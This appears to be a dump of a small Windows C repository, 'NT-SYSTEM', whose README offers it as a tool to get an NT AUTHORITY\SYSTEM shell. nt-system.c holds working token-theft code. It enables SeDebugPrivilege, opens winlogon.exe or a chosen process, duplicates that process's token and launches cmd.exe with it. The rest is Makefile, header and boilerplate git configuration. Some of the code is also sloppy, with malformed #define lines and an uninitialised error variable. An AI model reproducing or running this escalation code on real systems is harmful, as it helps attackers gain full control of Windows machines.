├── nt-system.h ├── Makefile ├── README.md ├── .gitattributes ├── nt-system.c └── .gitignore /nt-system.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | DWORD get_proc_id(char *name); 4 | void perrno(const char *func); 5 | 6 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | CC = x86_64-w64-mingw32-g++ 2 | FILE = nt-system.exe 3 | SRC = $(FILE:.exe=.c) 4 | OBJ = $(FILE:.exe=.o) 5 | 6 | $(FILE): $(OBJ) 7 | $(CC) $< -o $@ 8 | 9 | $(OBJ): 10 | 11 | clean: 12 | rm -- $(OBJ) $(FILE) 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NT-SYSTEM 2 | ### this is just a re-write of the original code in C, if you're starring this, might as well give the original coder some love as he's the one who came up with the idea 3 | 4 | tool to get NT SYSTEM shell , its works by duplicating tokens of already running system processes , you can also specify a process . 5 | Usage : 6 | run the following commands as admin 7 | ``` 8 | NT_sys_shell //in this case it uses winlogon by default 9 | ``` 10 | or 11 | ``` 12 | NT_sys_shell Name_of_process 13 | ``` 14 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /nt-system.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include "nt-system.h" 6 | 7 | enum LogonFlags { WithProfile = 1, NetCredentialsOnly }; 8 | 9 | enum CreationFlags 10 | { 11 | DefaultErrorMode = 0x04000000, 12 | NewConsole = 0x00000010, 13 | NewProcessGroup = 0x00000200, 14 | SeparateWOWVDM = 0x00000800, 15 | Suspended = 0x00000004, 16 | UnicodeEnvironment = 0x00000400, 17 | ExtendedStartupInfoPresent = 0x00080000 18 | }; 19 | /* 20 | #ifndef LUID 21 | 22 | struct _LUID { 23 | DWORD LowPart; 24 | LONG HighPart; 25 | } LUID, * PLUID; 26 | 27 | #endif 28 | */ 29 | #ifndef TOKEN_QUERY 30 | #define STANDARD_RIGHTS_REQUIRED = 0x000F0000 31 | #define STANDARD_RIGHTS_READ = 0x00020000 32 | #define TOKEN_ASSIGN_PRIMARY = 0x0001 33 | #define TOKEN_DUPLICATE = 0x0002 34 | #define TOKEN_IMPERSONATE = 0x0004 35 | #define TOKEN_QUERY = 0x0008 36 | #define TOKEN_QUERY_SOURCE = 0x0010 37 | #define TOKEN_ADJUST_PRIVILEGES = 0x0020 38 | #define TOKEN_ADJUST_GROUPS = 0x0040 39 | #define TOKEN_ADJUST_DEFAULT = 0x0080 40 | #define TOKEN_ADJUST_SESSIONID = 0x0100 41 | #define TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY) 42 | #define TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | \ 43 | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |\ 44 | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |\ 45 | TOKEN_ADJUST_SESSIONID) 46 | #endif 47 | 48 | int main(int argc, char *argv[]){ 49 | 50 | BOOL is_winlogon = FALSE; 51 | 52 | if (argc != 2) { 53 | puts("\n[+]using by default winlogon.exe\n"); 54 | is_winlogon = TRUE; 55 | } 56 | 57 | /* Enabling SeDebugpriv in case its not enabled */ 58 | 59 | const WCHAR* Privilege = L"SeDebugPrivilege"; 60 | 61 | HANDLE token; 62 | PHANDLE hToken = &token; 63 | LUID luid; 64 | TOKEN_PRIVILEGES TP; 65 | LUID_AND_ATTRIBUTES lu_attr ; 66 | DWORD trash; 67 | 68 | HANDLE hCurrentproc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId()); 69 | if(hCurrentproc == INVALID_HANDLE_VALUE){ 70 | puts("[-] Couldn't open handle to current process\n"); 71 | exit(EXIT_FAILURE); 72 | } 73 | 74 | if(!OpenProcessToken(hCurrentproc, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,hToken)){ 75 | fprintf(stderr, "[-] error retrieving token for the current process :\n"); 76 | perrno((char *)"OpenProcessToken"); 77 | CloseHandle(hCurrentproc); 78 | exit(EXIT_FAILURE); 79 | } 80 | 81 | if(!LookupPrivilegeValue(NULL, (LPCSTR)Privilege, &luid)){ 82 | fprintf(stderr, "[-] couldnt get a handle to privilege struct\n"); 83 | perror("LookupPrivilegeValue"); 84 | CloseHandle(hCurrentproc); 85 | exit(EXIT_FAILURE); 86 | } 87 | 88 | /* Saving old state */ 89 | TOKEN_PRIVILEGES old_state = TOKEN_PRIVILEGES(); 90 | 91 | lu_attr.Luid = luid; 92 | lu_attr.Attributes = SE_PRIVILEGE_ENABLED; 93 | TP.PrivilegeCount = 1; 94 | TP.Privileges[0] = lu_attr; 95 | 96 | if (!AdjustTokenPrivileges(token, FALSE, &TP, (unsigned __int32)sizeof(TP), &old_state, &trash)) { 97 | printf("%d", GetLastError()); 98 | puts("[-] can't adjust token for debug priveleges "); 99 | exit(1); 100 | } 101 | puts("[+] SeDebugPrivilege set up correctly!\n"); 102 | 103 | /* duplicating the token */ 104 | 105 | HANDLE target = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, is_winlogon ? get_proc_id((char *)"winlogon.exe") : get_proc_id(argv[1])); 106 | if(!target){ 107 | fprintf(stderr, "Can't find %d PID", is_winlogon ? "winlogon.exe" : argv[1]); 108 | CloseHandle(hCurrentproc); 109 | return -1; 110 | } 111 | 112 | SECURITY_IMPERSONATION_LEVEL seImpLv = SecurityImpersonation; 113 | TOKEN_TYPE tkentype = TokenPrimary; 114 | SECURITY_ATTRIBUTES sec_att = SECURITY_ATTRIBUTES(); 115 | HANDLE newtoken; 116 | 117 | if (target == INVALID_HANDLE_VALUE) 118 | { 119 | puts("[-] Couldn't open handle to target process\n"); 120 | CloseHandle(hCurrentproc); 121 | exit(1); 122 | } 123 | 124 | if (!OpenProcessToken(target, TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_DUPLICATE, hToken)) 125 | { 126 | 127 | puts("[-] error retrieving token for the target process\n"); 128 | CloseHandle(hCurrentproc); 129 | exit(1); 130 | } 131 | puts("[+] system process token retrieved\n"); 132 | if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, &sec_att, seImpLv, tkentype, &newtoken)) 133 | { 134 | printf("%d", GetLastError()); 135 | puts("[+] unable to duplicate token \n"); 136 | CloseHandle(hCurrentproc); 137 | exit(1); 138 | } 139 | puts("[+] Token duplicated successfully\n"); 140 | 141 | /* Creating the new process and getting NT AUTHORITY privilege */ 142 | STARTUPINFO SI = STARTUPINFO(); 143 | PROCESS_INFORMATION PI; 144 | 145 | if (!CreateProcessWithTokenW(newtoken, NetCredentialsOnly, L"C:\\Windows\\System32\\cmd.exe", NULL, NewConsole, 0, NULL, (LPSTARTUPINFOW)&SI, &PI)) 146 | { 147 | 148 | puts("[+] unable to create process \n"); 149 | CloseHandle(hCurrentproc); 150 | exit(1); 151 | } 152 | puts("[+] process Created success !"); 153 | return 0; 154 | } 155 | 156 | DWORD get_proc_id(char *name){ 157 | DWORD pid = 0; 158 | PROCESSENTRY32 pe = {0}; 159 | 160 | HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 161 | if(h == INVALID_HANDLE_VALUE){ 162 | fprintf(stderr, "CreateToolhelp32Snapshot failed with %lld\n", GetLastError()); 163 | return pid; 164 | } 165 | 166 | pe.dwSize = sizeof(PROCESSENTRY32); 167 | if(Process32First(h, &pe)){ 168 | do{ 169 | if(!strcmp(pe.szExeFile, name)){ 170 | pid = pe.th32ProcessID; 171 | break; 172 | } 173 | }while(Process32Next(h, &pe)); 174 | } 175 | else 176 | perrno((char *)"Process32First"); 177 | 178 | CloseHandle(h); 179 | 180 | return pid; 181 | } 182 | 183 | void perrno(const char *func){ 184 | TCHAR err_msg[256] = {0}; 185 | DWORD errn; 186 | 187 | FormatMessage( FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 188 | NULL, errn, 189 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 190 | err_msg, 256, NULL ); 191 | 192 | fprintf(stderr, "\n WARNING: %s failed with error %d (%s)\n", func, errno, err_msg ); 193 | } 194 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Build results 17 | [Dd]ebug/ 18 | [Dd]ebugPublic/ 19 | [Rr]elease/ 20 | [Rr]eleases/ 21 | x64/ 22 | x86/ 23 | [Aa][Rr][Mm]/ 24 | [Aa][Rr][Mm]64/ 25 | bld/ 26 | [Bb]in/ 27 | [Oo]bj/ 28 | [Ll]og/ 29 | 30 | # Visual Studio 2015/2017 cache/options directory 31 | .vs/ 32 | # Uncomment if you have tasks that create the project's static files in wwwroot 33 | #wwwroot/ 34 | 35 | # Visual Studio 2017 auto generated files 36 | Generated\ Files/ 37 | 38 | # MSTest test Results 39 | [Tt]est[Rr]esult*/ 40 | [Bb]uild[Ll]og.* 41 | 42 | # NUNIT 43 | *.VisualState.xml 44 | TestResult.xml 45 | 46 | # Build Results of an ATL Project 47 | [Dd]ebugPS/ 48 | [Rr]eleasePS/ 49 | dlldata.c 50 | 51 | # Benchmark Results 52 | BenchmarkDotNet.Artifacts/ 53 | 54 | # .NET Core 55 | project.lock.json 56 | project.fragment.lock.json 57 | artifacts/ 58 | 59 | # StyleCop 60 | StyleCopReport.xml 61 | 62 | # Files built by Visual Studio 63 | *_i.c 64 | *_p.c 65 | *_h.h 66 | *.ilk 67 | *.meta 68 | *.obj 69 | *.iobj 70 | *.pch 71 | *.pdb 72 | *.ipdb 73 | *.pgc 74 | *.pgd 75 | *.rsp 76 | *.sbr 77 | *.tlb 78 | *.tli 79 | *.tlh 80 | *.tmp 81 | *.tmp_proj 82 | *_wpftmp.csproj 83 | *.log 84 | *.vspscc 85 | *.vssscc 86 | .builds 87 | *.pidb 88 | *.svclog 89 | *.scc 90 | 91 | # Chutzpah Test files 92 | _Chutzpah* 93 | 94 | # Visual C++ cache files 95 | ipch/ 96 | *.aps 97 | *.ncb 98 | *.opendb 99 | *.opensdf 100 | *.sdf 101 | *.cachefile 102 | *.VC.db 103 | *.VC.VC.opendb 104 | 105 | # Visual Studio profiler 106 | *.psess 107 | *.vsp 108 | *.vspx 109 | *.sap 110 | 111 | # Visual Studio Trace Files 112 | *.e2e 113 | 114 | # TFS 2012 Local Workspace 115 | $tf/ 116 | 117 | # Guidance Automation Toolkit 118 | *.gpState 119 | 120 | # ReSharper is a .NET coding add-in 121 | _ReSharper*/ 122 | *.[Rr]e[Ss]harper 123 | *.DotSettings.user 124 | 125 | # JustCode is a .NET coding add-in 126 | .JustCode 127 | 128 | # TeamCity is a build add-in 129 | _TeamCity* 130 | 131 | # DotCover is a Code Coverage Tool 132 | *.dotCover 133 | 134 | # AxoCover is a Code Coverage Tool 135 | .axoCover/* 136 | !.axoCover/settings.json 137 | 138 | # Visual Studio code coverage results 139 | *.coverage 140 | *.coveragexml 141 | 142 | # NCrunch 143 | _NCrunch_* 144 | .*crunch*.local.xml 145 | nCrunchTemp_* 146 | 147 | # MightyMoose 148 | *.mm.* 149 | AutoTest.Net/ 150 | 151 | # Web workbench (sass) 152 | .sass-cache/ 153 | 154 | # Installshield output folder 155 | [Ee]xpress/ 156 | 157 | # DocProject is a documentation generator add-in 158 | DocProject/buildhelp/ 159 | DocProject/Help/*.HxT 160 | DocProject/Help/*.HxC 161 | DocProject/Help/*.hhc 162 | DocProject/Help/*.hhk 163 | DocProject/Help/*.hhp 164 | DocProject/Help/Html2 165 | DocProject/Help/html 166 | 167 | # Click-Once directory 168 | publish/ 169 | 170 | # Publish Web Output 171 | *.[Pp]ublish.xml 172 | *.azurePubxml 173 | # Note: Comment the next line if you want to checkin your web deploy settings, 174 | # but database connection strings (with potential passwords) will be unencrypted 175 | *.pubxml 176 | *.publishproj 177 | 178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 179 | # checkin your Azure Web App publish settings, but sensitive information contained 180 | # in these scripts will be unencrypted 181 | PublishScripts/ 182 | 183 | # NuGet Packages 184 | *.nupkg 185 | # The packages folder can be ignored because of Package Restore 186 | **/[Pp]ackages/* 187 | # except build/, which is used as an MSBuild target. 188 | !**/[Pp]ackages/build/ 189 | # Uncomment if necessary however generally it will be regenerated when needed 190 | #!**/[Pp]ackages/repositories.config 191 | # NuGet v3's project.json files produces more ignorable files 192 | *.nuget.props 193 | *.nuget.targets 194 | 195 | # Microsoft Azure Build Output 196 | csx/ 197 | *.build.csdef 198 | 199 | # Microsoft Azure Emulator 200 | ecf/ 201 | rcf/ 202 | 203 | # Windows Store app package directories and files 204 | AppPackages/ 205 | BundleArtifacts/ 206 | Package.StoreAssociation.xml 207 | _pkginfo.txt 208 | *.appx 209 | 210 | # Visual Studio cache files 211 | # files ending in .cache can be ignored 212 | *.[Cc]ache 213 | # but keep track of directories ending in .cache 214 | !?*.[Cc]ache/ 215 | 216 | # Others 217 | ClientBin/ 218 | ~$* 219 | *~ 220 | *.dbmdl 221 | *.dbproj.schemaview 222 | *.jfm 223 | *.pfx 224 | *.publishsettings 225 | orleans.codegen.cs 226 | 227 | # Including strong name files can present a security risk 228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 229 | #*.snk 230 | 231 | # Since there are multiple workflows, uncomment next line to ignore bower_components 232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 233 | #bower_components/ 234 | 235 | # RIA/Silverlight projects 236 | Generated_Code/ 237 | 238 | # Backup & report files from converting an old project file 239 | # to a newer Visual Studio version. Backup files are not needed, 240 | # because we have git ;-) 241 | _UpgradeReport_Files/ 242 | Backup*/ 243 | UpgradeLog*.XML 244 | UpgradeLog*.htm 245 | ServiceFabricBackup/ 246 | *.rptproj.bak 247 | 248 | # SQL Server files 249 | *.mdf 250 | *.ldf 251 | *.ndf 252 | 253 | # Business Intelligence projects 254 | *.rdl.data 255 | *.bim.layout 256 | *.bim_*.settings 257 | *.rptproj.rsuser 258 | *- Backup*.rdl 259 | 260 | # Microsoft Fakes 261 | FakesAssemblies/ 262 | 263 | # GhostDoc plugin setting file 264 | *.GhostDoc.xml 265 | 266 | # Node.js Tools for Visual Studio 267 | .ntvs_analysis.dat 268 | node_modules/ 269 | 270 | # Visual Studio 6 build log 271 | *.plg 272 | 273 | # Visual Studio 6 workspace options file 274 | *.opt 275 | 276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 277 | *.vbw 278 | 279 | # Visual Studio LightSwitch build output 280 | **/*.HTMLClient/GeneratedArtifacts 281 | **/*.DesktopClient/GeneratedArtifacts 282 | **/*.DesktopClient/ModelManifest.xml 283 | **/*.Server/GeneratedArtifacts 284 | **/*.Server/ModelManifest.xml 285 | _Pvt_Extensions 286 | 287 | # Paket dependency manager 288 | .paket/paket.exe 289 | paket-files/ 290 | 291 | # FAKE - F# Make 292 | .fake/ 293 | 294 | # JetBrains Rider 295 | .idea/ 296 | *.sln.iml 297 | 298 | # CodeRush personal settings 299 | .cr/personal 300 | 301 | # Python Tools for Visual Studio (PTVS) 302 | __pycache__/ 303 | *.pyc 304 | 305 | # Cake - Uncomment if you are using it 306 | # tools/** 307 | # !tools/packages.config 308 | 309 | # Tabs Studio 310 | *.tss 311 | 312 | # Telerik's JustMock configuration file 313 | *.jmconfig 314 | 315 | # BizTalk build output 316 | *.btp.cs 317 | *.btm.cs 318 | *.odx.cs 319 | *.xsd.cs 320 | 321 | # OpenCover UI analysis results 322 | OpenCover/ 323 | 324 | # Azure Stream Analytics local run output 325 | ASALocalRun/ 326 | 327 | # MSBuild Binary and Structured Log 328 | *.binlog 329 | 330 | # NVidia Nsight GPU debugger configuration file 331 | *.nvuser 332 | 333 | # MFractors (Xamarin productivity tool) working folder 334 | .mfractor/ 335 | 336 | # Local History for Visual Studio 337 | .localhistory/ 338 | 339 | # BeatPulse healthcheck temp database 340 | healthchecksdb --------------------------------------------------------------------------------